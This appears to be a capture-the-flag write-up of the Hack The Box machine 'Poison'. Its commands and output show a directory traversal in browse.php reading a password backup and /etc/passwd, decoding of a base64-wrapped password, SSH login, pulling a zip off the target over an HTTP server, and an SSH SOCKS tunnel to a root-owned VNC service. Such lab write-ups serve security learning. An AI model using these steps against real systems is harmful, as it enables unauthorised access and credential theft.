Enumeration Stage
Service/Port Scan
NMAP (network mapper)
The nmap reveals two services running on port 22 (ssh) and port 80 (HTTP). Apache FreeBSD 2.4.29.
$ nmap -sV -sC -p- -o poison.txt 10.10.10.84
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-14 06:00 EDT
Nmap scan report for 10.10.10.84
Host is up (0.049s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
| 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
Web Application
Overview
We are greeted by a temporary website that is used to test some local scripts. So, let’s test them 🙂
Functionalities test
I am going to test each functionality for hints, security gaps etc… In the process of poking the application I discovered a password backup file from the listfiles.php and a directory traversal attack vector under file=
# curl http://10.10.10.84/browse.php?file=listfiles.php 1 ⨯
Array
(
[0] => .
[1] => ..
[2] => browse.php
[3] => index.php
[4] => info.php
[5] => ini.php
[6] => listfiles.php
[7] => phpinfo.php
[8] => pwdbackup.txt
)
# curl http://10.10.10.84/browse.php?file=pwdbackup.txt 130 ⨯
This password is secure, it's encoded atleast 13 times.. what could go wrong really..
Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVUbGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBSbVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVWM040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRsWmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYyeG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01GWkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYwMXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVaT1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5kWFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZkWGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZTVm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZzWkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBWVmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpOUkd4RVdub3dPVU5uUFQwSwo=
I have wrote a short loop bash script to decrypt the password and got:
Charix!2#4%6&8(0
A browse.php file that expects value for its variable file introduces vulnerability called directory traversal and provides access to other sensitive files.
The down below command dumps the contents of /etc/passwd file which contains all available users on the system.
$ curl http://10.10.10.84/browse.php?file=../../../../../../../../../../../../etc/passwd 2 ⨯
# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh
Now that we have a valid user and a valid password – we’re in!
Privelege Escalation
Foothold
# ssh [email protected] 255
Password for [email protected]:
Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017
Welcome to FreeBSD!
...[snip]...
[email protected]:~ %
Enumeration – Files/Writeable/SUID
I have discovered a password protected zip file. Opened an HTTP server and transferred the file to my local kali machine to crack it.
[email protected]:~ % ls
secret secret.zip user.txt
[email protected]:~ % unzip secret.zip
Archive: secret.zip
extracting: secret |
unzip: Passphrase required for this entry
[email protected]:~ % python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.14.2 - - [14/May/2021 13:36:22] "GET /secret.zip HTTP/1.1" 200 -
Cracking Secret
Trying to crack the pwd protected file proven a bit frustrating until I realised I did not reuse the password for charix…
# zip2john secret.zip > passtocrack.hash 82 ⨯
ver 2.0 secret.zip/secret PKZIP Encr: cmplen=20, decmplen=8, crc=77537827
┌──(root💀kali)-[/home/kali]
└─# fcrackzip -u -D -p '/usr/share/wordlists/english.txt' secret.zip 130 ⨯
┌──(root💀kali)-[/home/kali]
└─# fcrackzip -u -D -p '/usr/share/wordlists/realhuman_phill.txt' secret.zip
──(root💀kali)-[/home/kali]
└─# fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' secret.zip 1 ⨯
┌──(root💀kali)-[/home/kali]
└─# fcrackzip -u -D -p '/usr/share/wordlists/fasttrack.txt' secret.zip
┌──(root💀kali)-[/home/kali]
└─# unzip secret.zip
Archive: secret.zip
[secret.zip] secret password:
password incorrect--reenter:
extracting: secret
Looking at the file I see that it is probably a binary file which content makes no sense but since the file was protected and hidden he may be the “secret” to something to come.
┌──(root💀kali)-[/home/kali]
└─# file secret
secret: Non-ISO extended-ASCII text, with no line terminators
# hexdump -C secret
00000000 bd a8 5b 7c d5 96 7a 21 |..[|..z!|
00000008
Process Enumeration
I have discovered an interesting process called Xvnc. Xvnc is a Vitrual Network Computing server and its used as remote desktop connection, runs as root and it has open ports 5901 and 5801.
[email protected]:~ % ps aux all
....[snip]....
root 529 0.0 0.9 23620 8872 v0- S 11:45 0:00.03 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/cla
....[snip]...
[email protected]:~ % sockstat -l |grep Xvnc
root Xvnc 529 0 stream /tmp/.X11-unix/X1
root Xvnc 529 1 tcp4 127.0.0.1:5901 *:*
root Xvnc 529 3 tcp4 127.0.0.1:5801 *:*
Accessing the VNC
Good explanation on how we can access it is given in the following intro to ssh tunneling. However shortly put – I am checking for the proxychains local port in order to redirect the ssh connection through it in order for me to access the vnc locally with a password phrase “secret” from the unzipped file.
┌──(root💀kali)-[/home/kali]
└─# cat /etc/proxychains4.conf
...[snip]...
socks4 127.0.0.1 9050
...[snip]...
┌──(root💀kali)-[/home/kali]
└─# ssh [email protected] -D 9050
Password for [email protected]:
[email protected]:~ %
┌──(root💀kali)-[/home/kali]
└─# proxychains vncviewer 127.0.0.1:5901 -passwd secret
And we’ve done it. Such a nice box. The owner of the box made the mistake to host functionalities which introduce huge plethora of security issues. Then, he also made the mistakes to not only reuse his password but also store it in a file on his local computer. To sum it up – We have learned a little bit about tunneling, proxychains, dir traverse and Xvnc.
Try smarter, not harder. 